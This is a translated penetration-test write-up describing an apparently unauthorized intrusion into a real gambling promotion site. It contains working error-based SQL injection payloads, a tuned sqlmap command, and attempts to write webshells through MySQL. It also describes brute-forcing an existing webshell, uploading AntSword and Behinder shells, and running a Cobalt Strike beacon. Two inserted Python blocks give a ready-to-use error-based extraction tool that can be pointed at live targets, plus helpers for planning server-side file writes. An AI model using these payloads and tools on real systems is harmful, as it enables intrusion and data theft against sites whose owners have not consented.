Title: Write-up of a penetration test against a BC (gambling) promotion site

0x00 Information Gathering

A friend passed me a site, a fairly large BC (gambling) operation. The main site offered no way in, so I switched to one of its promotion platforms.

[image]

First a rough directory scan, hoping to turn up something useful. Here I can recommend a service for quickly checking a site's sensitive files, https://scan.top15.cn/web/infoleak, for example whether the site's source code has been left packed up in an archive. Obviously it found nothing in this case; the scan results are below anyway.

[image]

config.inc.php should, from experience, be the database configuration file, but its size is 0 bytes. I tried requesting it anyway; as expected, no access, it returns 403. Still from experience, I scanned once more in case an FCKeditor was lying around. Unfortunately nothing came up. /index.php/login/ is only 2 KB, so it is not an admin backend at all, a bit disappointing. There is only one web asset on this port, so all I could do was look at the site's own functions. I clicked into the query feature and hoped to find injection there.

0x01  Backend Injection

[image]

Sure enough, there is injection; what remains is to look for the backend.

[image]

Read the current database name: and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-

[image]

A pitfall worth noting here: account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--(' is the complete payload. At first my payload was account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+.

It never returned any data, and I thought there was some damn filter in the way.

So I fuzzed it one piece at a time.

Then I wondered whether the comment needed closing, so I appended '). Sure enough, once it was closed the data came out.

Then I used sqlmap to dump data, but unexpectedly it could not get anything out.

Only after rebuilding the sqlmap command by hand, python2 sqlmap.py -r 1.txt --prefix "')" --suffix "--('" --level 3 --tamper=space2plus --skip-urlencode, did it finally dump.

Looking at the payload afterwards: every time it ran, the spaces were URL-encoded to %20, and once URL-encoded the payload no longer took effect, so I used the --skip-urlencode option.
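The extraction the write-up does by hand (and then via sqlmap with --prefix/--suffix), as an added example that is not code from the original post. It reuses the post's prefix `')` and suffix `--('`, and adds the piece a manual run needs in practice: MySQL truncates the extractvalue() XPATH error text to 32 characters, so anything longer than the database name has to be read with substr() in chunks. The target, its data and `fake_send` are constructed stand-ins; against a real site `send` must place the value in the request byte-for-byte as built (no percent-encoding), which is the problem the author hit with sqlmap before --skip-urlencode.

```python
import re

# Constructed offline stand-in for the vulnerable endpoint. It models the query the
# write-up injects into, (account='<input>'), and answers with a MySQL-style
# extractvalue() error. Swap fake_send for a function that sends the HTTP request
# and returns the response body to use extract() against a live target.
FAKE_DB = {  # constructed sample values, not data from the write-up's target
    "database()": "wnshd_com",
    "user()": "root@localhost",
    "group_concat(schema_name) from information_schema.schemata":
        "information_schema,mysql,performance_schema,wnshd_com",
}

_SUBSTR = re.compile(r"substr\(\(select (.+?)\),(\d+),(\d+)\)")

def fake_send(account_value: str) -> str:
    """Pretend to run ... WHERE (account='<account_value>') and echo the DB error."""
    m = _SUBSTR.search(account_value)
    if not m:
        return "OK"  # the probe never reached extractvalue()
    expr, pos, length = m.group(1), int(m.group(2)), int(m.group(3))
    leaked = "~" + FAKE_DB.get(expr, "")[pos - 1 : pos - 1 + length]
    # MySQL truncates the XPATH error text to 32 characters, marker included.
    return f"XPATH syntax error: '{leaked[:32]}'"

# Prefix/suffix exactly as the write-up ended up using them: `')` closes the
# original paren+quote, `--('` re-balances the closing `')` the application appends.
PREFIX = "1') and ("
SUFFIX = ")--('"
CHUNK = 31        # 32-character error limit minus the 0x7e (~) marker
MAX_CHUNKS = 64   # hard stop so a misbehaving oracle cannot loop forever

def build_payload(expr: str, pos: int, length: int) -> str:
    """Error-based probe for <length> chars of <expr> starting at 1-based <pos>."""
    probe = f"extractvalue(1,concat(0x7e,substr((select {expr}),{pos},{length})))"
    return f"{PREFIX}{probe}{SUFFIX}"

_ERR = re.compile(r"XPATH syntax error: '~([^']*)'")

def extract(expr: str, send=fake_send) -> str:
    """Pull the full value of <expr> through the error channel, 31 chars at a time."""
    out, pos = "", 1
    for _ in range(MAX_CHUNKS):
        m = _ERR.search(send(build_payload(expr, pos, CHUNK)))
        if not m:
            raise RuntimeError("no extractvalue error in response: "
                               "prefix/suffix or encoding is wrong")
        chunk = m.group(1)
        out += chunk
        if len(chunk) < CHUNK:  # a short (or empty) chunk means we hit the end
            return out
        pos += CHUNK
    raise RuntimeError("value longer than MAX_CHUNKS*CHUNK characters")

if __name__ == "__main__":
    for e in ("database()", "user()",
              "group_concat(schema_name) from information_schema.schemata"):
        print(f"{e:>60} -> {extract(e)}")
```

Only a leading marker is used (not the 0x7e on both sides as in the post's one-shot payload), because a trailing marker would cost one of the 32 characters; the end of the value is detected by a chunk shorter than 31 characters instead.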

0x02 Injection Point

Another surprise: I checked the privileges, and after so many MySQL injections I finally had one with relatively high privileges.

[image]

I did not even bother reading the account and password directly. The error messages had already leaked the absolute path. Isn't this a job for --os-shell? But when I looked at the payload I saw hws (HuWeiShen host guard), and I felt this was not going to be easy, brothers.

[image]

Sure enough, it could not write, and adding --hex did not help either.

Fine, --sql-shell then.

Writing via stacked queries: I knew it probably would not work, but you still have to try, just in case.

Pentesting is damn voodoo.

[image]

I checked the priv; it was not NULL, which gave me a little hope. Write it, a txt first to see.

select 1 into outfile 'D:/wwwroot/wnshd.com_22fqiz/web/1.txt'

[image]

Then I visited it on the site: nothing had been written. Really tough.

All that is left is --file-write. No screenshot for this one; it still did not go through.

Helpless, all I could do was read the backend account and password.
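The checks behind the "priv was not NULL" step and the INTO OUTFILE / --file-write attempts above, as an added example that is not code from the original post. `outfile_allowed` applies MySQL's @@secure_file_priv rule to a planned write path, and `dumpfile_statement` builds the hex-literal write that sqlmap's --file-write/--hex produce. The paths and file content are constructed; the write-up's own target path was D:/wwwroot/wnshd.com_22fqiz/web/1.txt.

```python
import ntpath

def outfile_allowed(secure_file_priv, target_path: str) -> bool:
    """Apply MySQL's @@secure_file_priv rule to a planned INTO OUTFILE / DUMPFILE.

    None (SQL NULL) -> server-side file writes are disabled outright;
    ''              -> no path restriction (the only value that lets you write
                       straight under a web root);
    a directory     -> only files inside that directory.
    Windows path rules (ntpath) are used because the target lived on D:/wwwroot.
    """
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = ntpath.normcase(ntpath.normpath(secure_file_priv)).rstrip("\\") + "\\"
    target = ntpath.normcase(ntpath.normpath(target_path))
    return target.startswith(base)

def dumpfile_statement(path: str, content: bytes) -> str:
    """Write <content> to <path> as a hex literal, the way sqlmap --file-write does.
    DUMPFILE writes the bytes verbatim (no row terminator), and the hex literal keeps
    quotes and '<?php' out of the statement text, which is what --hex is for."""
    if "'" in path:
        raise ValueError("path contains a quote; build it with CHAR() instead")
    return f"SELECT 0x{content.hex()} INTO DUMPFILE '{path}'"

# What to read through --sql-shell before spending time on writes.
PREFLIGHT = (
    "SELECT @@secure_file_priv",                          # NULL / '' / directory
    "SELECT @@version_compile_os, @@datadir, @@basedir",  # confirm OS and paths
    "SHOW GRANTS",                                        # is FILE granted at all?
)

if __name__ == "__main__":
    web_root_file = "D:/wwwroot/site/web/1.txt"   # constructed path
    for priv in (None, "", "D:/wwwroot/", "D:\\MySQL\\Uploads"):
        print(f"secure_file_priv={priv!r:22} -> allowed={outfile_allowed(priv, web_root_file)}")
    print(dumpfile_statement(web_root_file, b"1"))
```

Two things the post's repeated failures illustrate: sqlmap reports a write as successful when the query did not error, not when the file exists, so confirm by fetching the file as the author did; and even with FILE granted and secure_file_priv empty, MySQL refuses to overwrite an existing file, the mysqld service account needs NTFS write access to the directory, and a host guard such as hws can block the write on the filesystem side.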

[image]

Having collected the credentials, I went looking for the backend, but unfortunately still could not find it; almost despair.

It has damn well been served to me on a plate, so why can't I get in? I suspected sqlmap was the problem and redid the steps above. I understand sqlmap may lie to you, but hws does not: if it cannot be written, it just cannot.

Forget it, let's change approach. Isn't the directory name already exposed?

wolsoowpppps. I went back and checked it: no surprise, 403. wolsoowpppps/admin, wolsoowpppps/login.

Nothing. dirsearch scanned it, still damn nothing.

0x03 Failed webshell write

Is the path not web/wolsoowpppps? Could my absolute path be wrong? I visited it.

[image]

Also 403, which only means this directory was not found by the scan. Damn, I feel there is something here.

So I scanned it. I will stop posting screenshots; there was still nothing.

Ha ha ha ha.

All that excitement for nothing.

But I kept feeling there was something off about this wolsoowppps directory. I fuzzed it, fuzzed my way to web, then scanned web. Oh my goodness: temp.php. Visiting it gave a big webshell.

Isn't that just handing it over?

[image]

Then brute force: finally cracked the shell password, uploaded an AntSword shell, and took it down.

This big webshell looks very familiar.

[image]

But hws really is powerful.

Commands cannot be executed, and neither the plug-in method nor the .so method found a way around it.

[image]

Thanks to Brother Huang here. The HuWeiShen host guard he mentioned mainly targets ASP, so just drop a Behinder (ice scorpion) shell.

[image]

Then I tried a lot of approaches, but I cannot get this privilege escalation done. I am sure the bosses on xz know how; let me describe the situation.

Currently I only have read and modify permissions on drive D, and exe files cannot be executed, which means the MS-series kernel exploits are out.

The Potato family cannot be uploaded.

IIS cannot be popped instantly.

Antivirus on the box: the product the translation renders as "turquoise", the HuWeiShen host guard, and SafeDog.

The CS beacon is up, but executing DLLs and mshta hangs. I do not know how to escalate for now. I want to keep expanding, but I have little experience with privilege escalation; I hope the xz masters will give this newbie some ideas.

0x04 Taking the backend

Finally, I thought about how the big webshell had been uploaded.

The other party probably also started from the injection, found XSS in one place (I found it too, but since customer service went offline in October the site has been changed, so my XSS never fired), found the backend, and since this is a ThinkPHP 3.2.3 site, used the backend RCE (tp3.2.3 cache getshell) to drop the big webshell.

This is the location of the XSS

[image]

This is the backend

[image]

Although this site is relatively large, the attack path was very simple; I should learn more from it.

Reprinted from the original: https://mp.weixin.qq.com/s/qNdLNaPNK_485uAPILQXRQ (also at https://xz.aliyun.com/t/8491)
